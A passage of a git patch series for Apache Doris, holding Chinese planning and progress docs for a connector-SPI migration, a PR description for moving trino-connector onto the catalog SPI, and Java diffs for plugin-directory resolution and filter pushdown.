`CreateTableInfoToConnectorRequestConverter` 覆盖 IDENTITY/TRANSFORM/LIST/RANGE 四种 partition + hash/random bucket;`PluginDrivenExternalCatalog.createTable` 路由到 SPI;fe-core BUILD SUCCESS + checkstyle 0;JDBC/ES 下游 zero-impact - **2026-05-24(深夜)** ✅ **P0 批 0 fe-core 桥接完成**(T09-T12):`ExternalMetaCacheInvalidator` + `ConnectorMvccSnapshotAdapter` 新类、`DefaultConnectorContext.getMetaInvalidator()` override、`PluginDrivenTransactionManager` 加 SPI `ConnectorTransaction` 重载(legacy auto-commit 不变);fe-core 全编译通过 + checkstyle 0 violations;JDBC/ES 下游 zero-impact @@ -129,8 +141,8 @@ > 当本项目通过 Claude Code 这类 LLM agent 推进时,跟踪当前 session 状态、handoff 状况和 context 健康度。 -- **本 session 已完成**:P0 批 2 守门 + 单测(T21-T23, T26-T27)—— 1 个新脚本(`tools/check-connector-imports.sh`)+ 1 个 fe-connector aggregator pom 加 exec-maven-plugin + 4 个 fe-core test 新文件(`FakeConnectorPlugin` + 3 个 *Test);39/39 tests green;checkstyle 0;T24/T25 转交用户在本地跑 JDBC/ES regression-test -- **下一个 session 应做**:等 T24/T25 用户跑完后翻 ✅ → P0 阶段全收尾 → 启动 P1(scan-node 收口);或在等待期间开 P0-T28 benchmark(R-006 缓解,原列入 P1)作为 P0 末加项 +- **本 session 已完成**:P1 批 A (T3+T4+T5) commit `43a12a05ffe`(local,未 push)→ 批 B (T1) recon 揭示 callers 非 dead code → 用户决议 T1 推迟 P8 → P1 阶段关闭 → 跟踪文档(P1 task / PROGRESS / HANDOFF)全部同步 +- **下一个 session 应做**:(1)push `catalog-spi-02` 到 morningman fork;(2)`gh pr create --repo apache/doris --base branch-catalog-spi --head morningman:catalog-spi-02`;(3)启动 P2 (trino-connector) recon - **是否需要 handoff**:是,已写新 [HANDOFF.md](./HANDOFF.md) - **协作规范**:[AGENT-PLAYBOOK.md](./AGENT-PLAYBOOK.md)(context 预算、subagent 使用、handoff 触发条件) diff --git a/plan-doc/tasks/P1-scan-node-cleanup.md b/plan-doc/tasks/P1-scan-node-cleanup.md new file mode 100644 index 00000000000000..d2a9521d0ad3f7 --- /dev/null +++ b/plan-doc/tasks/P1-scan-node-cleanup.md @@ -0,0 +1,137 @@ +# P1 — scan-node 收口 + 重复清理 + +> 阶段总览见 [00-master-plan §3.2](../00-connector-migration-master-plan.md)。 +> 协作规范见 [AGENT-PLAYBOOK.md](../AGENT-PLAYBOOK.md)。 + +--- + +## 元信息 + +- **状态**:✅ 完成(in-scope: T3+T4+T5;T1 推迟 P8;T2 推迟 P4/P5) +- **启动日期**:2026-05-25 +- **目标完成**:2026-06-01(1 周) +- **实际完成**:2026-05-25(提前;scope 大幅收窄) +- **阻塞**:无 +- **阻塞下游**:P2 (trino-connector) 可启动;批 A scan-node 收口已就位 +- **主 owner**:@me +- **分支**:`catalog-spi-02`(基于 `upstream-apache/branch-catalog-spi`;批 A 已 commit 43a12a05ffe,待 push + PR) + +--- + +## 阶段目标 + +承接 P0 的 SPI baseline,做两件事: + +1. **删旧**:清理 fe-core 中已经被 SPI 实现覆盖、但还没删的 legacy 代码(JDBC 旧 client、Paimon/MaxCompute 重复 converter)。 +2. **收口**:把 `PhysicalPlanTranslator.visitPhysicalFileScan` 的 7+ 个 `instanceof XExternalTable` 分支统一到 `PluginDrivenExternalTable` 路径(迁移期可保留老分支兜底);让 `LogicalFileScan.computeOutput` 通过 SPI 而非 instanceof 拿 metadata 列。 + +完成后: + +- `PhysicalPlanTranslator` 不再 `import` 任何具体 `*ExternalTable` 类(除迁移期 fallback)。 +- 后续每个连接器迁移(P3-P7)只需删掉对应 fallback 分支,不需要触碰 scan-node 主干。 + +--- + +## 验收标准 + +从 master plan §3.2 同步(**两项推迟**已在状态前置标注): + +- 🚫 ~~13 个 `datasource/jdbc/client/Jdbc*Client.java` + `JdbcFieldSchema.java` 全部删除~~ — **推迟到 P8**(2026-05-25 决议:3 个 fe-core caller 是活的 CDC streaming 代码,删除需 SPI 扩展,不属 P1 surgical scope。详见任务清单 T1 备注) +- 🚫 ~~fe-core 重复的 `PaimonPredicateConverter` + `McStructureHelper` 处理完毕~~ — **推迟到 P4/P5**(用户决议 Q2,2026-05-25) +- [x] `PhysicalPlanTranslator.visitPhysicalFileScan` 优先走 `PluginDrivenExternalTable` 分支 — 批 A T3 +- [x] `visitPhysicalHudiScan` 通过 `PluginDrivenScanNode` 处理增量场景(分支已就位,P3 Hudi 迁移时激活) — 批 A T4 +- [x] `LogicalFileScan.computeOutput` 不再 `instanceof IcebergExternalTable / HMSExternalTable` —— **部分达成**:新增 `PluginDrivenExternalTable` 分支前置;Iceberg 分支保留作 P6 fallback —— 批 A T5 +- 🟡 `PhysicalPlanTranslator` 不再 `import` 任何具体 `*ExternalTable` 类(除迁移期 fallback) — **迁移期保留**(用户决议 Q3);7 个连接器特定分支在 P3-P7 各自迁移完成时随主任务删除 +- [x] fe-core 全编译 + checkstyle 0 +- [ ] PR CI 全绿(待批 A push + PR 创建后由 CI 报告) + +--- + +## 任务清单 + +> ID 永不复用。批次方案 2026-05-25 用户已确认:批 A=T3+T4+T5、批 B=T1、T2 推迟 P4/P5。 + +| ID | 任务 | 批次 | Owner | 状态 | PR | 启动 | 完成 | 备注 | +|---|---|---|---|---|---|---|---|---| +| P1-T01 | 删除 13 个 `Jdbc*Client.java` + `JdbcFieldSchema.java` | **🚫 推迟到 P8** | — | 🚫 | — | — | — | 2026-05-25 recon 结论:3 个 fe-core caller(PostgresResourceValidator / StreamingJobUtils / CdcStreamTableValuedFunction)均为活的 CDC streaming 代码(非 dead code),删除需在 ConnectorPlugin/ConnectorMetadata 上为 CDC 暴露 `getPrimaryKeys`/`getColumnsFromJdbc`/`listTables` 等 capability。用户决议(Q4):不在 P1 阶段做 SPI 扩展,T1 推迟到 P8 收尾,届时与 streaming CDC 重构一起做 | +| P1-T02 | 重复 `PaimonPredicateConverter` + `McStructureHelper` 处理 | **🚫 推迟到 P4/P5** | — | 🚫 | — | — | — | 2026-05-25 用户决议(Q2):fe-core caller 本身是 P4/P5 要删的 legacy;本阶段不动 | +| P1-T03 | `PhysicalPlanTranslator.visitPhysicalFileScan` 收口(**保留 fallback**) | **批 A** | @me | ✅ | TBD | 2026-05-25 | 2026-05-25 | `PluginDrivenExternalTable` 分支提到 if-else 链最前;7 个老分支原地保留作 P3-P7 迁移期 fallback | +| P1-T04 | `visitPhysicalHudiScan` 委托给 `PluginDrivenScanNode` | **批 A** | @me | ✅ | TBD | 2026-05-25 | 2026-05-25 | 新分支前置;`scanParams` + `tableSnapshot` 经 `FileQueryScanNode` setters 透传;`incrementalRelation` 待 P3 Hudi 迁移时 SPI 扩展(TODO 注释已落) | +| P1-T05 | `LogicalFileScan.computeOutput` 改走 SPI | **批 A** | @me | ✅ | TBD | 2026-05-25 | 2026-05-25 | 新增 `computePluginDrivenOutput()`(与 `computeIcebergOutput` 同 shape,用 `getFullSchema` + virtualColumns);`supportPruneNestedColumn` 加 `PluginDrivenExternalTable → false` 显式分支(无新 SPI capability 时保守默认);`IcebergExternalTable` 路径原地保留 | + +**状态图例**:⏳ pending / 🚧 in_progress / ✅ done / ❌ blocked / 🚫 deleted + +--- + +## 阶段日志(倒序) + +### 2026-05-25(白天 ④)— P1 收尾:T1 推迟到 P8 + +批 B (T1) 启动前 recon 结论:13 个 legacy JDBC client + JdbcFieldSchema 的 3 个 fe-core caller **均为活的 CDC streaming 代码**: + +- `PostgresResourceValidator.java`(`job/extensions/insert/streaming/`):CREATE JOB 时校验 PG 复制槽 / 发布,被 `StreamingJobUtils.validateSource` → `StreamingInsertJob.validateTvfSource` → `CreateJobCommand`/`AlterJobCommand` 链路使用 +- `StreamingJobUtils.java`(`job/util/`):`getJdbcClient()` + `jdbcClient.getPrimaryKeys()` / `getColumnsFromJdbc()` / `getTablesNameList()`,CDC 表枚举 + DDL 生成 +- `CdcStreamTableValuedFunction.java`(`tablefunction/`):`cdc_stream` TVF,被 `CdcStream.java:46` 调,streaming 作业执行链路 + +测试侧:`StreamingJobUtilsTest` 需重写;`JdbcFieldSchemaTest`/`JdbcClickHouseClientTest`/`JdbcClientExceptionTest` 测 legacy 本身(随源删除)。fe-connector 侧 SPI 替换 `Jdbc*ConnectorClient` 已就位,但 **fe-core 不能直接 import**(会破坏 `tools/check-connector-imports.sh` 守门)。 + +**用户决议(Q4,2026-05-25)**:推迟 T1 到 P8 收尾。理由: +- 删 T1 需要在 ConnectorPlugin/ConnectorMetadata 上为 CDC use case 暴露新 capability(getPrimaryKeys / getColumnsFromJdbc / listTables),是 SPI 扩展工作,超出 Master Plan §3.2 P1 scope +- 现状无 runtime 风险——legacy JDBC client 仍在原位,CDC 功能正常 +- P8 收尾阶段与 streaming CDC 重构一起做,避免 P1 阶段引入 1-2 天计划外 SPI 设计工作 + +**P1 in-scope 完成度**:T3+T4+T5 ✅;T1 推迟 P8;T2 推迟 P4/P5。P1 阶段关闭,准备 batch A push + PR,进入 P2 (trino-connector)。 + +### 2026-05-25(白天 ③)— 批 A 编码完成(T3 + T4 + T5) + +实施了三处 SPI 收口(保留迁移期 fallback): + +- **T3** — `PhysicalPlanTranslator.visitPhysicalFileScan`:把现有 `if (table instanceof PluginDrivenExternalTable)` 分支提到 if-else 链最前;7 个连接器特定分支(HMS/Iceberg/Paimon/Trino/MaxCompute/LakeSoul/RemoteDoris)原地保留作 P3-P7 迁移期 fallback。 +- **T4** — `PhysicalPlanTranslator.visitPhysicalHudiScan`:在 method 顶部新增 `PluginDrivenExternalTable` 分支,路由到 `PluginDrivenScanNode.create(...)`,通过 `FileQueryScanNode` setters 透传 `tableSnapshot` / `scanParams`。`hudiScan.getIncrementalRelation()` 增量场景被记为 P3 Hudi SPI 扩展的 TODO(注释已落)。HMS + DLAType.HUDI 路径保留。本分支今日不可达(PhysicalHudiScan 目前只为 HMSExternalTable 创建),P3 Hudi 迁移时激活。 +- **T5** — `LogicalFileScan`: + - `computeOutput()`:新增 `PluginDrivenExternalTable` 分支,调新增 helper `computePluginDrivenOutput()`,用 `getFullSchema() + virtualColumns`(与 `computeIcebergOutput` 同 shape)。JDBC/ES 当前无 hidden cols 也无 virtualColumns,行为等价。Iceberg 分支原地保留。 + - `supportPruneNestedColumn()`:新增 `PluginDrivenExternalTable → return false` 显式分支。语义无变化(fall-through 也是 false),但显式声明 SPI 默认;未来加 `ConnectorCapability` 时改这里。 + - 新增 import:`org.apache.doris.datasource.PluginDrivenExternalTable`。 + +**编译 / Checkstyle**:`mvn -pl fe-core -am compile` BUILD SUCCESS;`mvn -pl fe-core checkstyle:check` 0 violations。 + +**测试范围**:三处变更对 JDBC/ES(当前唯一已迁 SPI 连接器)行为等价(fullSchema == baseSchema 且无 virtualColumns;supportPruneNestedColumn 原本就 false)。集成层信号依赖 PR CI 上的 JDBC + ES regression-test(P0 已基线 PASS)。本地单测层未新增——三处都是路由 reorder + 显式声明,难以在不引入 PluginDrivenExternalTable mock 的前提下意义单测;待 PR review 决定是否补。 + +### 2026-05-25(白天 ②)— 批次方案确认 + +用户回复 3 个决策点(HANDOFF Q1/Q2/Q3): + +- **Q1 → A → B → C**:先做 T3+T4+T5 scan-node 收口(批 A),再删 legacy JDBC client(批 B),T2 推迟到 P4/P5 +- **Q2 → 推迟 T2**:fe-core PaimonPredicateConverter + McStructureHelper 留到 P4/P5 caller 删除时一并干掉;P1 不动 +- **Q3 → 保留 fallback**:T3 仅把 `PluginDrivenExternalTable` 分支提到最前;老 instanceof 链原地保留,每个连接器在 P3-P7 迁移完成时删对应分支 + +任务表的"批次"列已同步更新;T2 状态翻 🚫(推迟标记)。 + +### 2026-05-25(白天)— 阶段启动 + recon + +- 新建分支 `catalog-spi-02` 基于 `upstream-apache/branch-catalog-spi`(PR #63582 已合入 `c6f056fa5bd`) +- Recon 5 个子任务,输出代码侧 facts: + - **T1**:13 个 `Jdbc*Client.java`(合计 ~2730 LOC)+ `JdbcFieldSchema.java`(129 LOC)。fe-core 内 3 个外部 caller 必须先解耦:`PostgresResourceValidator.java`、`StreamingJobUtils.java`、`CdcStreamTableValuedFunction.java`。3 个测试需删或迁 + - **T2**:fe-core 有 `datasource/paimon/source/PaimonPredicateConverter.java`(201 LOC)和 `datasource/maxcompute/McStructureHelper.java`(298 LOC)。fe-connector 侧的对应类是 canonical 版本。fe-core caller:`PaimonScanNode`、`MaxComputeExternalCatalog`、`MaxComputeMetadataOps` 自身就是 legacy,P4/P5 会删 + - **T3**:`PhysicalPlanTranslator.visitPhysicalFileScan` lines 726-797(72 LOC),含 8 个 instanceof 分支(HMSExternalTable + 嵌套 DLAType 路由;Iceberg / Paimon / Trino / MaxCompute / LakeSoul / RemoteDoris / PluginDrivenExternalTable)。`PluginDrivenScanNode.create(...)` 和 `PluginDrivenExternalTable` 已存在 + - **T4**:`visitPhysicalHudiScan` lines 821-841(21 LOC),目前断言 HMSExternalTable + DLAType.HUDI,构造 HudiScanNode 时传 `getScanParams()` + `getIncrementalRelation()` 支持增量 + - **T5**:`LogicalFileScan.computeOutput` lines 201-212(12 LOC),instanceof IcebergExternalTable 时走 `computeIcebergOutput()` 加 v3 row-lineage 虚拟列。`supportPruneNestedColumn()` 也用了 3 个 instanceof(lines 236-238) + - **Bonus**:`nereids/` 目录下还有 ~62 处 `instanceof.*ExternalTable`;P1 范围只覆盖 PhysicalPlanTranslator + LogicalFileScan,其余 50+ 处在 P3-P7 各连接器迁移时随主任务清理 +- 批次方案待用户确认(见 HANDOFF) + +--- + +## 关联 + +- Master plan 章节:[§3.2 P1 阶段](../00-connector-migration-master-plan.md) +- RFC 章节:n/a(P1 是 SPI 消费方收口,不涉及 SPI 设计修改) +- 决策:— +- 偏差:— +- 风险:R-008(文档脱节)、R-001(image 兼容回归——T3/T4/T5 收口须不影响序列化路径) +- 连接器:jdbc(T1)、paimon(T2)、maxcompute(T2);T3-T5 是平台层 + +--- + +## 当前阻塞项 + +无。P1 阶段关闭,剩余动作仅为 batch A push + PR 创建(待用户授权)。下一阶段 P2 (trino-connector) 可启动。 From 508e7feaa5691380546f00b0d9e431ed81858db7 Mon Sep 17 00:00:00 2001 From: "Mingyu Chen (Rayner)" Date: Thu, 4 Jun 2026 21:27:27 +0800 Subject: [PATCH 004/128] [feat](connector) P2 migrate trino-connector to catalog SPI (T01-T13) (#64096) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit ### What problem does this PR solve? Related PR: #63582 (P0 — SPI baseline), #63641 (P1 — nereids plugin-driven routing) Problem Summary: This is **P2** of the catalog SPI migration and targets the `branch-catalog-spi` feature branch (continuing P0 #63582 and P1 #63641). It fully migrates `trino-connector` off the legacy in-tree `fe-core/datasource/trinoconnector/` implementation and onto the connector SPI module `fe-connector-trino`, making `trino-connector` the first connector to complete the SPI consumption playbook that later connectors will reuse as a template. All five batches land together so there is no intermediate state where a newly-created trino catalog cannot be serialized. **Batch A — complete the SPI surface (`fe-connector-trino` only, no fe-core changes)** - `TrinoConnectorProvider.validateProperties`: enforce the required `trino.connector.name` property at `CREATE CATALOG` time (ported from the legacy `checkProperties`). - `TrinoDorisConnector.preCreateValidation`: call `ensureInitialized()` so plugin loading + connector-factory resolution happen at catalog creation instead of being deferred to the first `SELECT`. - `TrinoConnectorDorisMetadata.applyFilter` / `applyProjection`: bridge Trino native filter/projection pushdown, reusing `TrinoPredicateConverter` to translate a Doris `ConnectorExpression` into a Trino `TupleDomain`. `remainingFilter` is conservatively returned as the original expression to match legacy behavior (conjuncts are not stripped; BE re-evaluates them). **Batch B — fe-core bridge for image compatibility** - `GsonUtils`: atomically replace the three legacy `registerSubtype` entries (`TrinoConnectorExternalCatalog` / `Database` / `Table`) with `registerCompatibleSubtype` redirects onto the `PluginDrivenExternal*` hierarchy. This must be atomic — `RuntimeTypeAdapterFactory` rejects duplicate labels, so keeping both bindings would throw at static init. Mirrors what ES/JDBC already did. - `PluginDrivenExternalCatalog.gsonPostProcess`: extract a `legacyLogTypeToCatalogType()` helper that maps `Type.TRINO_CONNECTOR` → `"trino-connector"`; the generic `name().toLowerCase()` would otherwise produce the wrong `"trino_connector"` (underscore) that `CatalogFactory` does not recognize. - `PluginDrivenExternalTable.getEngine()` / `getEngineTableTypeName()`: add `trino-connector` branches that preserve the legacy engine-name / table-type display across `SHOW TABLE STATUS` and `information_schema`. **Batch C — flip the switch** - Add `"trino-connector"` to `CatalogFactory.SPI_READY_TYPES` so catalog creation routes through the SPI path. **Batch D — remove legacy code** - Drop the `instanceof TrinoConnectorExternalTable` scan branch in `PhysicalPlanTranslator` (the `PluginDrivenExternalTable` SPI branch already handles it). - Drop `case "trino-connector"` in `CatalogFactory`. - Delete `fe-core/datasource/trinoconnector/` (10 files) and the now-dead legacy `TrinoConnectorPredicateTest`. - Route the `TRINO_CONNECTOR` db-build case in `ExternalCatalog` to `PluginDrivenExternalDatabase` (mirrors the migrated JDBC case). - **Retained for image compatibility**: the `InitCatalogLog.Type.TRINO_CONNECTOR` and `TableType.TRINO_CONNECTOR_EXTERNAL_TABLE` enums, the GsonUtils redirects, and the `MetastoreProperties` trino-connector entry. **Batch E — tests + tracking docs** - 29 JUnit 5 unit tests over the plugin-free converters: - `TrinoPredicateConverterTest` — `ConnectorExpression` pushdown trees → Trino `TupleDomain` (EQ / range / NE / IN / IS [NOT] NULL / AND / OR, Slice encoding), plus graceful degradation to `TupleDomain.all()` on null/unsupported input. - `TrinoTypeMappingTest` — Trino SPI type → Doris `ConnectorType` (scalars, decimal precision/scale, timestamp precision clamp, array/map/struct, unsupported-type failure). - `TrinoConnectorProviderTest` — `validateProperties` fast-fails when `trino.connector.name` is missing/empty. - No Trino plugin/cluster required; plugin-dependent paths remain covered by the existing `external_table_p0/p2` `trino_connector` regression suites. - Sync the migration tracking docs under `plan-doc/` (already carried on this feature branch since P0). **Net effect**: 28 files, +1025 / −2681 (~1656 LOC net removed). Old FE images holding legacy trino catalogs / databases / tables deserialize onto the `PluginDrivenExternal*` hierarchy through the GsonUtils string-name redirect, with engine-name display preserved. **Deferred (follow-ups, not in this PR)**: - `trino_connector_migration_compat` regression test (old-image deserialization) — requires a running cluster + Trino plugin + docker, unavailable in this dev environment; tracked as a CI/cluster follow-up. - The plugin-install documentation update lives in the `doris-website` repo and is handled separately. ### Release note None ### Check List (For Author) - Test - [x] Unit Test — 29 new tests in `fe-connector-trino` (predicate converter / type mapping / property validation). - [ ] Regression test — existing `trino_connector` suites cover plugin paths; the new old-image compat regression is deferred to a CI/cluster follow-up. - [ ] Manual test (add detailed scripts or steps below) - [ ] No need to test or manual test. Explain why: - [ ] This is a refactor/code format and no logic has been changed. - [ ] Previous test can cover this change. - [ ] No code files have been changed. - [ ] Other reason - Behavior changed: - [x] No. Internal routing moves from the legacy fe-core path to the SPI path; image compatibility, engine-name display, and pushdown semantics all mirror the legacy behavior. All batches land together, so there is no serialization-gap window. - Does this need documentation? - [x] Yes. The trino-connector plugin-install doc update is a follow-up in the `doris-website` repo. ### Check List (For Reviewer who merge this PR) - [ ] Confirm the release note - [ ] Confirm test cases - [ ] Confirm document - [ ] Add branch pick label --- .../doris/connector/trino/TrinoBootstrap.java | 51 +- .../trino/TrinoConnectorDorisMetadata.java | 137 +++- .../trino/TrinoConnectorProvider.java | 11 + .../connector/trino/TrinoDorisConnector.java | 15 +- .../trino/TrinoScanPlanProvider.java | 73 +- .../connector/trino/TrinoBootstrapTest.java | 70 ++ .../trino/TrinoConnectorProviderTest.java | 61 ++ .../trino/TrinoPredicateConverterTest.java | 239 ++++++ .../connector/trino/TrinoTypeMappingTest.java | 141 ++++ fe/fe-core/pom.xml | 4 - .../connector/DefaultConnectorContext.java | 4 + .../doris/datasource/CatalogFactory.java | 9 +- .../doris/datasource/ExternalCatalog.java | 3 +- .../PluginDrivenExternalCatalog.java | 15 +- .../datasource/PluginDrivenExternalTable.java | 6 + .../TrinoConnectorExternalCatalog.java | 329 -------- .../TrinoConnectorExternalCatalogFactory.java | 30 - .../TrinoConnectorExternalDatabase.java | 37 - .../TrinoConnectorExternalTable.java | 263 ------- .../TrinoConnectorPluginLoader.java | 134 ---- .../trinoconnector/TrinoSchemaCacheValue.java | 90 --- .../TrinoConnectorPredicateConverter.java | 334 -------- .../source/TrinoConnectorScanNode.java | 342 -------- .../source/TrinoConnectorSource.java | 106 --- .../source/TrinoConnectorSplit.java | 95 --- .../translator/PhysicalPlanTranslator.java | 5 - .../apache/doris/persist/gson/GsonUtils.java | 18 +- .../TrinoConnectorPredicateTest.java | 736 ------------------ plan-doc/HANDOFF.md | 207 ++--- plan-doc/PROGRESS.md | 38 +- plan-doc/connectors/trino-connector.md | 65 +- plan-doc/deviations-log.md | 61 +- .../tasks/P2-trino-connector-migration.md | 197 +++++ 33 files changed, 1212 insertions(+), 2714 deletions(-) create mode 100644 fe/fe-connector/fe-connector-trino/src/test/java/org/apache/doris/connector/trino/TrinoBootstrapTest.java create mode 100644 fe/fe-connector/fe-connector-trino/src/test/java/org/apache/doris/connector/trino/TrinoConnectorProviderTest.java create mode 100644 fe/fe-connector/fe-connector-trino/src/test/java/org/apache/doris/connector/trino/TrinoPredicateConverterTest.java create mode 100644 fe/fe-connector/fe-connector-trino/src/test/java/org/apache/doris/connector/trino/TrinoTypeMappingTest.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/TrinoConnectorExternalCatalog.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/TrinoConnectorExternalCatalogFactory.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/TrinoConnectorExternalDatabase.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/TrinoConnectorExternalTable.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/TrinoConnectorPluginLoader.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/TrinoSchemaCacheValue.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/source/TrinoConnectorPredicateConverter.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/source/TrinoConnectorScanNode.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/source/TrinoConnectorSource.java delete mode 100644 fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/source/TrinoConnectorSplit.java delete mode 100644 fe/fe-core/src/test/java/org/apache/doris/datasource/trinoconnector/TrinoConnectorPredicateTest.java create mode 100644 plan-doc/tasks/P2-trino-connector-migration.md diff --git a/fe/fe-connector/fe-connector-trino/src/main/java/org/apache/doris/connector/trino/TrinoBootstrap.java b/fe/fe-connector/fe-connector-trino/src/main/java/org/apache/doris/connector/trino/TrinoBootstrap.java index 3b7d4892a2dfbc..eecb8078cddb56 100644 --- a/fe/fe-connector/fe-connector-trino/src/main/java/org/apache/doris/connector/trino/TrinoBootstrap.java +++ b/fe/fe-connector/fe-connector-trino/src/main/java/org/apache/doris/connector/trino/TrinoBootstrap.java @@ -144,6 +144,21 @@ public static TrinoBootstrap getInstance(String pluginDir) { return instance; } + /** + * Returns the already-initialized singleton. Callers that run after a catalog has been + * created (e.g. scan planning) use this instead of re-resolving the plugin directory. + * + * @throws IllegalStateException if the singleton has not been initialized yet + */ + public static TrinoBootstrap getInstance() { + TrinoBootstrap local = instance; + if (local == null) { + throw new IllegalStateException( + "TrinoBootstrap is not initialized; a catalog must be created first"); + } + return local; + } + /** * Returns the HandleResolver for JSON serialization of Trino SPI handles. */ @@ -277,21 +292,43 @@ private static void configureJulLogging() { } /** - * Resolves the Trino plugin directory from catalog properties. - * Falls back to DORIS_HOME/plugins/connectors and DORIS_HOME/connectors. + * Resolves the Trino plugin directory. + * + *

This plugin runs in an isolated classloader and cannot read FE {@code Config} + * (it would see its own bundled copy holding default values). The FE config + * {@code trino_connector_plugin_dir} is therefore passed in through the engine + * environment map (see {@code DefaultConnectorContext}), mirroring how the JDBC + * connector receives {@code jdbc_drivers_dir}. + * + *

Resolution order: + *

    + *
  1. the per-catalog {@code trino.plugin.dir} property, when set;
  2. + *
  3. the FE config {@code trino_connector_plugin_dir} from the environment, when it + * has been overridden in {@code fe.conf} (the regression environment relies on this);
  4. + *
  5. otherwise {@code DORIS_HOME/plugins/connectors}, falling back to the pre-2.1.8 + * default {@code DORIS_HOME/connectors} when it is non-empty.
  6. + *
+ * + * @param properties catalog properties (unstripped, may carry {@code trino.plugin.dir}) + * @param environment engine environment from {@code ConnectorContext.getEnvironment()} */ - public static String resolvePluginDir(Map properties) { + public static String resolvePluginDir(Map properties, Map environment) { String explicitDir = properties.get("trino.plugin.dir"); if (explicitDir != null && !explicitDir.isEmpty()) { return explicitDir; } - String dorisHome = System.getenv("DORIS_HOME"); - if (dorisHome == null) { - dorisHome = "."; + String dorisHome = environment.getOrDefault("doris_home", "."); + String defaultDir = dorisHome + "/plugins/connectors"; + String configuredDir = environment.get("trino_connector_plugin_dir"); + if (configuredDir != null && !configuredDir.isEmpty() && !configuredDir.equals(defaultDir)) { + // User explicitly set `trino_connector_plugin_dir` in fe.conf; use it directly. + return configuredDir; } - String defaultDir = dorisHome + "/plugins/connectors"; + // Config left at its default. The default changed from DORIS_HOME/connectors to + // DORIS_HOME/plugins/connectors in 2.1.8, so fall back to the old dir when it + // still holds connectors, for backward compatibility. String oldDir = dorisHome + "/connectors"; File oldDirFile = new File(oldDir); if (oldDirFile.exists() && oldDirFile.isDirectory()) { diff --git a/fe/fe-connector/fe-connector-trino/src/main/java/org/apache/doris/connector/trino/TrinoConnectorDorisMetadata.java b/fe/fe-connector/fe-connector-trino/src/main/java/org/apache/doris/connector/trino/TrinoConnectorDorisMetadata.java index 4142f014089d44..f71f4d9a94d3ab 100644 --- a/fe/fe-connector/fe-connector-trino/src/main/java/org/apache/doris/connector/trino/TrinoConnectorDorisMetadata.java +++ b/fe/fe-connector/fe-connector-trino/src/main/java/org/apache/doris/connector/trino/TrinoConnectorDorisMetadata.java @@ -22,14 +22,25 @@ import org.apache.doris.connector.api.ConnectorSession; import org.apache.doris.connector.api.ConnectorTableSchema; import org.apache.doris.connector.api.ConnectorType; +import org.apache.doris.connector.api.handle.ConnectorColumnHandle; import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.connector.api.pushdown.ConnectorColumnAssignment; +import org.apache.doris.connector.api.pushdown.ConnectorColumnRef; +import org.apache.doris.connector.api.pushdown.ConnectorExpression; +import org.apache.doris.connector.api.pushdown.ConnectorFilterConstraint; +import org.apache.doris.connector.api.pushdown.FilterApplicationResult; +import org.apache.doris.connector.api.pushdown.ProjectionApplicationResult; import com.google.common.collect.ImmutableMap; import io.trino.Session; import io.trino.spi.connector.CatalogHandle; import io.trino.spi.connector.ColumnHandle; import io.trino.spi.connector.ColumnMetadata; +import io.trino.spi.connector.Constraint; +import io.trino.spi.connector.ConstraintApplicationResult; import io.trino.spi.connector.SchemaTableName; +import io.trino.spi.expression.Variable; +import io.trino.spi.predicate.TupleDomain; import io.trino.spi.transaction.IsolationLevel; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -37,6 +48,7 @@ import java.util.ArrayList; import java.util.Collections; import java.util.HashMap; +import java.util.LinkedHashMap; import java.util.List; import java.util.Locale; import java.util.Map; @@ -168,12 +180,16 @@ public ConnectorTableSchema getTableSchema( continue; } ConnectorType connType = TrinoTypeMapping.toConnectorType(colMeta.getType()); + // Mark every column as a key column to match the Doris external-table convention + // (legacy TrinoConnectorExternalTable.initSchema and JdbcClient do the same), so + // `desc ` reports Key=true for each column. columns.add(new ConnectorColumn( colMeta.getName(), connType, colMeta.getComment(), true, - null)); + null, + true)); } Map tableProps = new HashMap<>(); @@ -187,17 +203,132 @@ public ConnectorTableSchema getTableSchema( } @Override - public Map getColumnHandles( + public Map getColumnHandles( ConnectorSession session, ConnectorTableHandle handle) { TrinoTableHandle trinoHandle = (TrinoTableHandle) handle; Map trinoHandles = trinoHandle.getColumnHandleMap(); if (trinoHandles == null || trinoHandles.isEmpty()) { return Collections.emptyMap(); } - Map result = new HashMap<>(); + Map result = new HashMap<>(); for (String colName : trinoHandles.keySet()) { result.put(colName, new TrinoColumnHandle(colName)); } return result; } + + @Override + public Optional> applyFilter( + ConnectorSession session, + ConnectorTableHandle handle, + ConnectorFilterConstraint constraint) { + TrinoTableHandle dorisHandle = (TrinoTableHandle) handle; + ConnectorExpression expression = constraint.getExpression(); + + TrinoPredicateConverter converter = new TrinoPredicateConverter( + dorisHandle.getColumnHandleMap(), + dorisHandle.getColumnMetadataMap()); + TupleDomain tupleDomain = converter.convert(expression); + if (tupleDomain.isAll()) { + return Optional.empty(); + } + + io.trino.spi.connector.ConnectorSession connSession = + trinoSession.toConnectorSession(trinoCatalogHandle); + io.trino.spi.connector.ConnectorTransactionHandle txn = + trinoConnector.beginTransaction(IsolationLevel.READ_UNCOMMITTED, true, true); + io.trino.spi.connector.ConnectorMetadata metadata = + trinoConnector.getMetadata(connSession, txn); + + Optional> trinoResult = + metadata.applyFilter(connSession, dorisHandle.getTrinoTableHandle(), + new Constraint(tupleDomain)); + if (!trinoResult.isPresent()) { + return Optional.empty(); + } + + TrinoTableHandle newHandle = new TrinoTableHandle( + dorisHandle.getDbName(), + dorisHandle.getTableName(), + trinoResult.get().getHandle(), + dorisHandle.getColumnHandleMap(), + dorisHandle.getColumnMetadataMap()); + + // Trino tracks the remaining filter as a TupleDomain, not as a Doris ConnectorExpression. + // Returning the original expression keeps BE-side re-evaluation, matching the legacy + // fe-core scan-node behavior. A future enhancement could try to map the 